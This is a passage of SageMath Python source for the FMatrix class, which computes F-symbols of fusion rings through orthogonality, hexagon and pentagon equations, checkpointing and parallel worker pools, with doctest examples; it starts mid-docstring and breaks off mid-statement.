5\n sage: f.findcases(output=True)\n ({0: (t, t, t, i0, t, t),\n 1: (t, t, t, t, i0, i0),\n 2: (t, t, t, t, i0, t),\n 3: (t, t, t, t, t, i0),\n 4: (t, t, t, t, t, t)},\n {(t, t, t, i0, t, t): fx0,\n (t, t, t, t, i0, i0): fx1,\n (t, t, t, t, i0, t): fx2,\n (t, t, t, t, t, i0): fx3,\n (t, t, t, t, t, t): fx4})\n \"\"\"\n i = 0\n if output:\n idx_map = dict()\n ret = dict()\n id_anyon = self._FR.one()\n for (a, b, c, d) in product(self._FR.basis(), repeat=4):\n if a == id_anyon or b == id_anyon or c == id_anyon:\n continue\n for x in self.f_from(a, b, c, d):\n for y in self.f_to(a, b, c, d):\n if output:\n v = self._poly_ring.gen(i)\n ret[(a, b, c, d, x, y)] = v\n idx_map[i] = (a, b, c, d, x, y)\n i += 1\n if output:\n return idx_map, ret\n else:\n return i\n\n def f_from(self, a, b, c, d):\n r\"\"\"\n Return the possible `x` such that there are morphisms\n `d \\to x \\otimes c \\to (a \\otimes b) \\otimes c`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A1\", 3, fusion_labels=\"a\", inject_variables=True)\n sage: f = fr.get_fmatrix()\n sage: f.fmatrix(a1, a1, a2, a2)\n [fx6 fx7]\n [fx8 fx9]\n sage: f.f_from(a1, a1, a2, a2)\n [a0, a2]\n sage: f.f_to(a1, a1, a2, a2)\n [a1, a3]\n \"\"\"\n return [x for x in self._FR.basis()\n if self._FR.Nk_ij(a, b, x) != 0 and self._FR.Nk_ij(x, c, d) != 0]\n\n def f_to(self, a, b, c, d):\n r\"\"\"\n Return the possible `y` such that there are morphisms\n `d \\to a \\otimes y \\to a \\otimes (b \\otimes c)`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: b22 = FusionRing(\"B2\", 2)\n sage: b22.fusion_labels(\"b\", inject_variables=True)\n sage: B = b22.get_fmatrix()\n sage: B.fmatrix(b2, b4, b2, b4)\n [fx266 fx267 fx268]\n [fx269 fx270 fx271]\n [fx272 fx273 fx274]\n sage: B.f_from(b2, b4, b2, b4)\n [b1, b3, b5]\n sage: B.f_to(b2, b4, b2, b4)\n [b1, b3, b5]\n \"\"\"\n return [y for y in self._FR.basis()\n if self._FR.Nk_ij(b, c, y) != 0 and self._FR.Nk_ij(a, y, d) != 0]\n\n ####################\n ### Data getters ###\n ####################\n\n def get_fvars(self):\n r\"\"\"\n Return a dictionary of F-symbols.\n\n The keys are sextuples `(a, b, c, d, x, y)` of basis elements of\n ``self.FR()`` and the values are the corresponding F-symbols\n `(F^{a, b, c}_d)_{xy}`.\n\n These values reflect the current state of a solver's computation.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix(inject_variables=True)\n creating variables fx1..fx8\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7\n sage: f.get_fvars()[(f1, f1, f1, f0, f2, f2)]\n fx0\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.get_fvars()[(f1, f1, f1, f0, f2, f2)]\n 1\n \"\"\"\n return self._fvars\n\n def get_poly_ring(self):\n r\"\"\"\n Return the polynomial ring whose generators denote the desired F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B6\", 1).get_fmatrix()\n sage: f.get_poly_ring()\n Multivariate Polynomial Ring in fx0, ..., fx13 over\n Cyclotomic Field of order 96 and degree 32\n \"\"\"\n return self._poly_ring\n\n # TODO: this method is incredibly slow... improve by keeping track of the cyclotomic polynomials, NOT their roots in QQbar\n def get_non_cyclotomic_roots(self):\n r\"\"\"\n Return a list of roots that define the extension of the associated\n :class:`FusionRing`'s base\n :class:`Cyclotomic field`,\n containing all the F-symbols.\n\n OUTPUT:\n\n The list of non-cyclotomic roots is given as a list of elements of the\n field returned by :meth:`field()`.\n\n If ``self.field() == self.FR().field()`` then this method\n returns an empty list.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"E6\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field() == f.FR().field()\n True\n sage: f.get_non_cyclotomic_roots()\n []\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field() == f.FR().field()\n False\n sage: phi = f.get_qqbar_embedding()\n sage: [phi(r).n() for r in f.get_non_cyclotomic_roots()]\n [-0.786151377757423 - 8.92806368517581e-31*I]\n\n When ``self.field()`` is a ``NumberField``, one may use\n :meth:`get_qqbar_embedding` to embed the resulting values into\n :class:`QQbar`.\n \"\"\"\n return sorted(set(self._non_cyc_roots))\n\n def get_qqbar_embedding(self):\n r\"\"\"\n Return an embedding from the base field containing F-symbols (the\n associated :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a :func:`NumberField`, or :class:`QQbar`) into\n :class:`QQbar`.\n\n This embedding is useful for getting a better sense for the\n F-symbols, particularly when they are computed as elements of a\n :func:`NumberField`. See also :meth:`get_non_cyclotomic_roots`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1)\n sage: f = fr.get_fmatrix(fusion_label=\"g\", inject_variables=True, new=True)\n creating variables fx1..fx5\n Defining fx0, fx1, fx2, fx3, fx4\n sage: f.find_orthogonal_solution()\n Computing F-symbols for The Fusion Ring of Type G2 and level 1 with Integer Ring coefficients with 5 variables...\n Set up 10 hex and orthogonality constraints...\n Partitioned 10 equations into 2 components of size:\n [4, 1]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 4 / 5 variables\n Set up 0 reduced pentagons...\n Pent elim step solved for 4 / 5 variables\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 1 equations into 1 components of size:\n [1]\n Computing appropriate NumberField...\n sage: phi = f.get_qqbar_embedding()\n sage: phi(f.fmat(g1, g1, g1, g1, g1, g1)).n()\n -0.618033988749895 + 1.46674215951686e-29*I\n \"\"\"\n return self._qqbar_embedding\n\n def get_coerce_map_from_fr_cyclotomic_field(self):\n r\"\"\"\n Return a coercion map from the associated :class:`FusionRing`'s\n cyclotomic field into the base field containing all F-symbols\n (this could be the :class:`FusionRing`'s\n :class:`Cyclotomic field`,\n a :func:`NumberField`, or :class:`QQbar`).\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.FR().field()\n Cyclotomic Field of order 60 and degree 16\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: phi = f.get_coerce_map_from_fr_cyclotomic_field()\n sage: phi.domain() == f.FR().field()\n True\n sage: phi.codomain() == f.field()\n True\n\n When F-symbols are computed as elements of the associated\n :class:`FusionRing`'s base\n :class:`Cyclotomic field`,\n we have ``self.field() == self.FR().field()`` and this\n returns the identity map on ``self.field()``. ::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: phi = f.get_coerce_map_from_fr_cyclotomic_field()\n sage: f.field()\n Cyclotomic Field of order 48 and degree 16\n sage: f.field() == f.FR().field()\n True\n sage: phi.domain() == f.field()\n True\n sage: phi.is_identity()\n True\n \"\"\"\n # If base field is different from associated FusionRing's CyclotomicField,\n # return coercion map\n try:\n return self._coerce_map_from_cyc_field\n # Otherwise, return identity map CyclotomicField <-> CyclotomicField\n except AttributeError:\n F = self._FR.field()\n return F.hom([F.gen()], F)\n\n def get_fvars_in_alg_field(self):\n r\"\"\"\n Return F-symbols as elements of the :class:`QQbar`.\n\n This method uses the embedding defined by\n :meth:`get_qqbar_embedding` to coerce\n F-symbols into :class:`QQbar`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1)\n sage: f = fr.get_fmatrix(fusion_label=\"g\", inject_variables=True, new=True)\n creating variables fx1..fx5\n Defining fx0, fx1, fx2, fx3, fx4\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: f.get_fvars_in_alg_field()\n {(g1, g1, g1, g0, g1, g1): 1,\n (g1, g1, g1, g1, g0, g0): 0.61803399? + 0.?e-8*I,\n (g1, g1, g1, g1, g0, g1): -0.7861514? + 0.?e-8*I,\n (g1, g1, g1, g1, g1, g0): -0.7861514? + 0.?e-8*I,\n (g1, g1, g1, g1, g1, g1): -0.61803399? + 0.?e-8*I}\n \"\"\"\n return {sextuple: self._qqbar_embedding(fvar) for sextuple, fvar in self._fvars.items()}\n\n def get_radical_expression(self):\n \"\"\"\n Return a radical expression of F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.FR().fusion_labels(\"g\", inject_variables=True)\n sage: f.find_orthogonal_solution(verbose=False)\n sage: radical_fvars = f.get_radical_expression() # long time (~1.5s)\n sage: radical_fvars[g1, g1, g1, g1, g1, g0] # long time\n -sqrt(1/2*sqrt(5) - 1/2)\n \"\"\"\n return {sextuple: val.radical_expression() for sextuple, val in self.get_fvars_in_alg_field().items()}\n\n #######################\n ### Private helpers ###\n #######################\n\n def _get_known_vals(self):\n r\"\"\"\n Construct a dictionary of ``idx``, ``known_val`` pairs used for\n substituting into remaining equations.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D4\", 1).get_fmatrix()\n sage: f._reset_solver_state()\n sage: len(f._get_known_vals()) == 0\n True\n sage: f.find_orthogonal_solution(verbose=False)\n sage: len(f._get_known_vals()) == f._poly_ring.ngens()\n True\n \"\"\"\n return {i: self._fvars[s] for i, s in self._idx_to_sextuple.items() if self._solved[i]}\n\n def _get_known_nonz(self):\n r\"\"\"\n Construct an :class:`ETuple` indicating positions of\n known nonzero variables.\n\n .. NOTE::\n\n MUST be called after ``self._ks = _get_known_sq()``.\n This method is called by the constructor of ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D5\", 1).get_fmatrix() # indirect doctest\n sage: f._reset_solver_state()\n sage: f._nnz\n (100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100,\n 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100)\n \"\"\"\n nonz = {idx: 100 for idx in self._singles}\n for idx, v in self._ks.items():\n nonz[idx] = 100\n return ETuple(nonz, self._poly_ring.ngens())\n\n ##############################\n ### Variables partitioning ###\n ##############################\n\n def largest_fmat_size(self):\n r\"\"\"\n Get the size of the largest F-matrix `F^{abc}_d`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: f.largest_fmat_size()\n 4\n \"\"\"\n return max(self.fmatrix(*tup).nrows() for tup in product(self._FR.basis(), repeat=4))\n\n def get_fvars_by_size(self, n, indices=False):\n r\"\"\"\n Return the set of F-symbols that are entries of an `n \\times n` matrix\n `F^{a, b, c}_d`.\n\n INPUT:\n\n - `n` -- a positive integer\n - ``indices`` -- boolean (default: ``False``)\n\n If ``indices`` is ``False`` (default),\n this method returns a set of sextuples `(a, b, c, d, x, y)` identifying\n the corresponding F-symbol. Each sextuple is a key in the\n dictionary returned by :meth:`get_fvars`.\n\n Otherwise the method returns a list of integer indices that\n internally identify the F-symbols. The ``indices=True`` option is\n meant for internal use.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A2\", 2).get_fmatrix(inject_variables=True)\n creating variables fx1..fx287\n Defining fx0, ..., fx286\n sage: f.largest_fmat_size()\n 2\n sage: f.get_fvars_by_size(2)\n {(f2, f2, f2, f4, f1, f1),\n (f2, f2, f2, f4, f1, f5),\n ...\n (f4, f4, f4, f4, f4, f0),\n (f4, f4, f4, f4, f4, f4)}\n \"\"\"\n var_set = set()\n one = self._FR.one()\n for a, b, c, d in product(self._FR.basis(), repeat=4):\n X = self.f_from(a, b, c, d)\n Y = self.f_to(a, b, c, d)\n if len(X) == n and len(Y) == n:\n for x in X:\n for y in Y:\n # Discard trivial 1x1 F-matrix\n trivial = a == one and x == b and y == d\n trivial |= b == one and x == a and y == c\n trivial |= c == one and x == d and y == b\n if not trivial:\n var_set.add((a, b, c, d, x, y))\n if indices:\n sext_to_idx = {v: k for k, v in self._idx_to_sextuple.items()}\n return {sext_to_idx[fx] for fx in var_set}\n return var_set\n\n ############################\n ### Checkpoint utilities ###\n ############################\n\n def save_fvars(self, filename):\n r\"\"\"\n Save computed F-symbols for later use.\n\n INPUT:\n\n - ``filename`` -- a string specifying the name of the pickle file\n to be used\n\n The current directory is used unless an absolute path to a file in\n a different directory is provided.\n\n .. NOTE::\n\n This method should only be used *after* successfully running one\n of the solvers, e.g. :meth:`find_cyclotomic_solution` or\n :meth:`find_orthogonal_solution`.\n\n When used in conjunction with :meth:`load_fvars`, this method may\n be used to restore state of an :class:`FMatrix` object at the end\n of a successful F-matrix solver run.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(verbose=False)\n sage: fvars = f.get_fvars()\n sage: K = f.field()\n sage: filename = f.get_fr_str() + \"_solver_results.pickle\"\n sage: f.save_fvars(filename)\n sage: del f\n sage: f2 = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n sage: f2.load_fvars(filename)\n sage: fvars == f2.get_fvars()\n True\n sage: K == f2.field()\n True\n sage: os.remove(filename)\n \"\"\"\n final_state = [\n self._fvars,\n self._non_cyc_roots,\n self.get_coerce_map_from_fr_cyclotomic_field(),\n self._qqbar_embedding,\n ]\n with open(filename, 'wb') as f:\n pickle.dump(final_state, f)\n\n def load_fvars(self, filename):\n r\"\"\"\n Load previously computed F-symbols from a pickle file.\n\n See :meth:`save_fvars` for more information.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(verbose=False)\n sage: fvars = f.get_fvars()\n sage: K = f.field()\n sage: filename = f.get_fr_str() + \"_solver_results.pickle\"\n sage: f.save_fvars(filename)\n sage: del f\n sage: f2 = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n sage: f2.load_fvars(filename)\n sage: fvars == f2.get_fvars()\n True\n sage: K == f2.field()\n True\n sage: os.remove(filename)\n\n .. NOTE::\n\n :meth:`save_fvars`. This method does not work with intermediate\n checkpoint pickles; it only works with pickles containing *all*\n F-symbols, i.e. those created by :meth:`save_fvars` and by\n specifying an optional ``save_results`` parameter for\n :meth:`find_orthogonal_solution`.\n \"\"\"\n with open(filename, 'rb') as f:\n self._fvars, self._non_cyc_roots, self._coerce_map_from_cyc_field, self._qqbar_embedding = pickle.load(f)\n # Update state attributes\n self._chkpt_status = 7\n self._solved = list(True for v in self._fvars)\n self._field = self._qqbar_embedding.domain()\n\n def get_fr_str(self):\n r\"\"\"\n Auto-generate an identifying key for saving results.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 1).get_fmatrix()\n sage: f.get_fr_str()\n 'B31'\n \"\"\"\n ct = self._FR.cartan_type()\n return ct.letter + str(ct.n) + str(self._FR.fusion_level())\n\n def _checkpoint(self, do_chkpt, status, verbose=True):\n r\"\"\"\n Pickle current solver state.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: f._checkpoint(do_chkpt=True, status=2)\n Checkpoint 2 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"fmatrix_solver_checkpoint_A13.pickle\")\n Computing F-symbols for The Fusion Ring of Type A1 and level 3 with Integer Ring coefficients with 71 variables...\n Set up 121 reduced pentagons...\n Elimination epoch completed... 18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n sage: f._chkpt_status == 7\n True\n sage: sum(f._solved) == f._poly_ring.ngens()\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A13.pickle\")\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: f.get_defining_equations('pentagons', output=False)\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: f._triangular_elim(verbose=False)\n sage: f._checkpoint(do_chkpt=True, status=4)\n Checkpoint 4 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"fmatrix_solver_checkpoint_A12.pickle\")\n Computing F-symbols for The Fusion Ring of Type A1 and level 2 with Integer Ring coefficients with 14 variables...\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 2 equations into 2 components of size:\n [1, 1]\n sage: f._chkpt_status == 7\n True\n sage: sum(f._solved) == f._poly_ring.ngens()\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A12.pickle\")\n \"\"\"\n if not do_chkpt:\n return\n filename = \"fmatrix_solver_checkpoint_\" + self.get_fr_str() + \".pickle\"\n with open(filename, 'wb') as f:\n pickle.dump([self._fvars, list(self._solved), self._ks, self.ideal_basis, status], f)\n if verbose:\n print(f\"Checkpoint {status} reached!\")\n\n def _restore_state(self, filename):\n r\"\"\"\n Load solver state from file. Use this method both for warm-starting\n :meth:`find_orthogonal_solution` and to load pickled results.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: fvars = f._fvars\n sage: ib = f.ideal_basis\n sage: solved = f._solved\n sage: ks = f._ks\n sage: status = f._chkpt_status\n sage: f._checkpoint(do_chkpt=True, status=2)\n Checkpoint 2 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f._restore_state(\"fmatrix_solver_checkpoint_A12.pickle\")\n sage: for sextuple, fvar in fvars.items():\n ....: assert fvar == f._fvars[sextuple]\n ....:\n sage: ib == f.ideal_basis\n True\n sage: ks == f._ks\n True\n sage: solved == f._solved\n True\n sage: 2 == f._chkpt_status\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A12.pickle\")\n\n TESTS::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(save_results=\"test.pickle\", verbose=False) # long time\n sage: del f\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"test.pickle\") # long time\n sage: f._chkpt_status == 7 # long time\n True\n sage: os.remove(\"test.pickle\") # long time\n \"\"\"\n with open(filename, 'rb') as f:\n state = pickle.load(f)\n # Loading saved results pickle\n if len(state) == 4:\n self.load_fvars(filename)\n self._chkpt_status = 7\n return\n self._fvars, self._solved, self._ks, self.ideal_basis, self._chkpt_status = state\n self._update_reduction_params()\n\n #################\n ### MapReduce ###\n #################\n\n def start_worker_pool(self, processes=None):\n \"\"\"\n Initialize a ``multiprocessing`` worker pool for parallel processing,\n which may be used e.g. to set up defining equations using\n :meth:`get_defining_equations`.\n\n This method sets ``self``'s ``pool`` attribute. The worker\n pool may be used time and again. Upon initialization, each process\n in the pool attaches to the necessary shared memory resources.\n\n When you are done using the worker pool, use\n :meth:`shutdown_worker_pool` to close the pool and properly dispose\n of shared memory resources.\n\n .. NOTE::\n\n Python 3.8+ is required, since the ``multiprocessing.shared_memory``\n module must be imported.\n\n INPUT:\n\n - ``processes`` -- an integer indicating the number of workers\n in the pool; if left unspecified, the number of workers is\n equals the number of processors available\n\n OUTPUT:\n\n This method returns a boolean indicating whether a worker pool\n was successfully initialized.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix(new=True)\n sage: f.start_worker_pool()\n sage: he = f.get_defining_equations('hexagons')\n sage: sorted(he)\n [fx0 - 1,\n fx2*fx3 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx4^2 + (zeta60^6)*fx4,\n fx1*fx3 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx3*fx4 + (zeta60^14 - zeta60^4)*fx3,\n fx1*fx2 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx2*fx4 + (zeta60^14 - zeta60^4)*fx2,\n fx1^2 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx2*fx3 + (-zeta60^12)*fx1]\n sage: pe = f.get_defining_equations('pentagons')\n sage: f.shutdown_worker_pool()\n\n .. WARNING::\n\n This method is needed to initialize the worker pool using the\n necessary shared memory resources. Simply using the\n ``multiprocessing.Pool`` constructor will not work with our\n class methods.\n\n .. WARNING::\n\n Failure to call :meth:`shutdown_worker_pool` may result in a memory\n leak, since shared memory resources outlive the process that created\n them.\n \"\"\"\n try:\n set_start_method('fork')\n except RuntimeError:\n pass\n if not hasattr(self, '_nnz'):\n self._reset_solver_state()\n # Set up shared memory resource handlers\n n_proc = cpu_count() if processes is None else processes\n self._pid_list = shared_memory.ShareableList([0]*(n_proc+1))\n pids_name = self._pid_list.shm.name\n self._solved = shared_memory.ShareableList(self._solved)\n s_name = self._solved.shm.name\n self._var_degs = shared_memory.ShareableList(self._var_degs)\n vd_name = self._var_degs.shm.name\n n = self._poly_ring.ngens()\n self._ks = KSHandler(n, self._field, use_mp=True, init_data=self._ks)\n ks_names = self._ks.shm.name\n self._shared_fvars = FvarsHandler(n, self._field, self._idx_to_sextuple, use_mp=n_proc, pids_name=pids_name, init_data=self._fvars)\n fvar_names = self._shared_fvars.shm.name\n # Initialize worker pool processes\n args = (id(self), s_name, vd_name, ks_names, fvar_names, n_proc, pids_name)\n\n def init(fmats_id, solved_name, vd_name, ks_names, fvar_names, n_proc, pids_name):\n \"\"\"\n Connect worker process to shared memory resources\n \"\"\"\n fmats_obj = cast(fmats_id, py_object).value\n fmats_obj._solved = shared_memory.ShareableList(name=solved_name)\n fmats_obj._var_degs = shared_memory.ShareableList(name=vd_name)\n n = fmats_obj._poly_ring.ngens()\n K = fmats_obj._field\n fmats_obj._fvars = FvarsHandler(n, K, fmats_obj._idx_to_sextuple, name=fvar_names, use_mp=n_proc, pids_name=pids_name)\n fmats_obj._ks = KSHandler(n, K, name=ks_names, use_mp=True)\n\n self.pool = Pool(processes=n_proc, initializer=init, initargs=args)\n self._pid_list[0] = getpid()\n for i, p in enumerate(self.pool._pool):\n self._pid_list[i+1] = p.pid\n # return True\n\n def shutdown_worker_pool(self):\n r\"\"\"\n Shutdown the given worker pool and dispose of shared memory resources\n created when the pool was set up using :meth:`start_worker_pool`.\n\n .. WARNING::\n\n Failure to call this method after using :meth:`start_worker_pool`\n to create a process pool may result in a memory\n leak, since shared memory resources outlive the process that\n created them.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.start_worker_pool()\n sage: he = f.get_defining_equations('hexagons')\n sage: f.shutdown_worker_pool()\n \"\"\"\n if self.pool is not None:\n self.pool.close()\n self.pool = None\n self._solved.shm.unlink()\n self._var_degs.shm.unlink()\n self._ks.shm.unlink()\n self._shared_fvars.shm.unlink()\n self._pid_list.shm.unlink()\n del self.__dict__['_shared_fvars']\n\n def _map_triv_reduce(self, mapper, input_iter, worker_pool=None, chunksize=None, mp_thresh=None):\n r\"\"\"\n Apply the given mapper to each element of the given input iterable and\n return the results (with no duplicates) in a list.\n\n INPUT:\n\n - ``mapper`` -- string specifying the name of a function defined in\n the ``fast_parallel_fmats_methods`` module\n\n .. NOTE::\n\n If ``worker_pool`` is not provided, function maps and reduces on a\n single process.\n If ``worker_pool`` is provided, the function attempts to determine\n whether it should use multiprocessing based on the length of the\n input iterable. If it can't determine the length of the input\n iterable then it uses multiprocessing with the default chunksize of\n `1` unless a chunksize is provided.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 2).get_fmatrix()\n sage: f._reset_solver_state()\n sage: len(f._map_triv_reduce('get_reduced_hexagons', [(0, 1, False)]))\n 11\n sage: f.start_worker_pool()\n sage: mp_params = [(i, f.pool._processes, True) for i in range(f.pool._processes)]\n sage: len(f._map_triv_reduce('get_reduced_pentagons', mp_params, worker_pool=f.pool, chunksize=1, mp_thresh=0))\n 33\n sage: f.shutdown_worker_pool()\n \"\"\"\n if mp_thresh is None:\n mp_thresh = self.mp_thresh\n # Compute multiprocessing parameters\n if worker_pool is not None:\n try:\n n = len(input_iter)\n except (TypeError, ValueError, AttributeError):\n n = mp_thresh + 1\n if chunksize is None:\n chunksize = n // (worker_pool._processes**2) + 1\n no_mp = worker_pool is None or n < mp_thresh\n # Map phase\n input_iter = zip_longest([], input_iter, fillvalue=(mapper, id(self)))\n if no_mp:\n mapped = map(executor, input_iter)\n else:\n mapped = worker_pool.imap_unordered(executor, input_iter, chunksize=chunksize)\n # Reduce phase\n results = set()\n for child_eqns in mapped:\n if child_eqns is not None:\n results.update(child_eqns)\n results = list(results)\n return results\n\n ########################\n ### Equations set up ###\n ########################\n\n def get_orthogonality_constraints(self, output=True):\n r\"\"\"\n Get equations imposed on the F-matrix by orthogonality.\n\n INPUT:\n\n - ``output`` -- a boolean\n\n OUTPUT:\n\n If ``output=True``, orthogonality constraints are returned as\n polynomial objects.\n\n Otherwise, the constraints are appended to ``self.ideal_basis``.\n They are stored in the internal tuple representation. The\n ``output=False`` option is meant mostly for internal use by the\n F-matrix solver.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B4\", 1).get_fmatrix()\n sage: f.get_orthogonality_constraints()\n [fx0^2 - 1,\n fx1^2 - 1,\n fx2^2 - 1,\n fx3^2 - 1,\n fx4^2 - 1,\n fx5^2 - 1,\n fx6^2 - 1,\n fx7^2 - 1,\n fx8^2 - 1,\n fx9^2 - 1,\n fx10^2 + fx12^2 - 1,\n fx10*fx11 + fx12*fx13,\n fx10*fx11 + fx12*fx13,\n fx11^2 + fx13^2 - 1]\n \"\"\"\n eqns = []\n for tup in product(self._FR.basis(), repeat=4):\n mat = self.fmatrix(*tup)\n eqns.extend((mat.T * mat - matrix.identity(mat.nrows())).coefficients())\n if output:\n return eqns\n self.ideal_basis.extend([poly_to_tup(eq) for eq in eqns])\n\n def get_defining_equations(self, option, output=True):\n r\"\"\"\n Get the equations defining the ideal generated by the hexagon or\n pentagon relations.\n\n INPUT:\n\n - ``option`` -- a string determining equations to be set up:\n\n * ``'hexagons'`` - get equations imposed on the F-matrix by\n the hexagon relations in the definition of a braided category\n\n * ``'pentagons'`` - get equations imposed on the F-matrix by\n the pentagon relations in the definition of a monoidal category\n\n - ``output`` -- (default: ``True``) a boolean indicating whether\n results should be returned, where the equations will be polynomials.\n Otherwise, the constraints are appended to ``self.ideal_basis``.\n Constraints are stored in the internal tuple representation. The\n ``output=False`` option is meant only for internal use by the\n F-matrix solver. When computing the hexagon equations with the\n ``output=False`` option, the initial state of the F-symbols is used.\n\n .. NOTE::\n\n To set up the defining equations using parallel processing,\n use :meth:`start_worker_pool` to initialize multiple processes\n *before* calling this method.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B2\", 1).get_fmatrix()\n sage: sorted(f.get_defining_equations('hexagons'))\n [fx7 + 1,\n fx6 - 1,\n fx2 + 1,\n fx0 - 1,\n fx11*fx12 + (-zeta32^8)*fx13^2 + (zeta32^12)*fx13,\n fx10*fx12 + (-zeta32^8)*fx12*fx13 + (zeta32^4)*fx12,\n fx10*fx11 + (-zeta32^8)*fx11*fx13 + (zeta32^4)*fx11,\n fx10^2 + (-zeta32^8)*fx11*fx12 + (-zeta32^12)*fx10,\n fx4*fx9 + fx7,\n fx3*fx8 - fx6,\n fx1*fx5 + fx2]\n sage: pe = f.get_defining_equations('pentagons')\n sage: len(pe)\n 33\n \"\"\"\n if not hasattr(self, '_nnz'):\n self._reset_solver_state()\n n_proc = 